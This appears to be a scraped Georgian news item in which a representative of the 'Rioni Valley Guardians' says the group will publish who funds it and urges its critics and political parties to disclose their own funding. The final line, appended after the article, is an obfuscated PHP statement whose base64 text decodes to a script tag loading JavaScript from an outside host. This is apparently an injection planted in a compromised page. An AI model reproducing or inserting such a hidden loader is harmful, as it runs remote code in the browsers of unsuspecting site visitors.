gorgia
ავერსი jaluzi
„რიონის ხეობის მცველების“ წარმომადგენლის ვარლამ გოლეთიანის განცხადებით, ყველა იმ წყაროს და კერძო პირის შესახებ ინფორაციის გასაჯაროვებას გეგმავს, რომლებიც მათ თანხებს ურიცხავენ.
 
ამასთან, გოლეთიანი მოუწოდებს პოლიტიკოსებსა და იმ მოქალაქეებს, ვისაც „რიონის ხეობის მცველების“ დამფინანსებლებში ეჭვი შეაქვთ, თავადაც გაასაჯაროვონ საკუთარი დაფინანსების წყაროები.
 
„არსებობს ინტერესი დაფინანსებასთან დაკავშირებით. ჩვენ გამოვდივართ ინიციატივით - დავდებთ ფინანსების წყაროებს, საიდანაც მოდის ეს თანხები. თუმცა, აქამდეც ვამბობთ, რომ ესენი არიან ემიგრანტები და ჩვენი თანამოქალაქეები. ეს დასაბუთდება, როცა ამ ყველაფერს გავასაჯაროვებთ. შემდეგ მოვუწოდებთ ყველა იმ ადამიანს, ვინც არის ამ ნარატივის ავტორი, საიდან ფინასდებიანო, რომ თავადაც გაასაჯაროვონ საკუთარი ფინანსები. ჩვენ დავიწყებთ ამას და შემდეგ ყველა ორგანიზაციამ, მათ შორის პოლიტიკურმა პარტიებმა, ცალკეულმა ადამიანებმა გაასაჯაროვოს.
1368
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");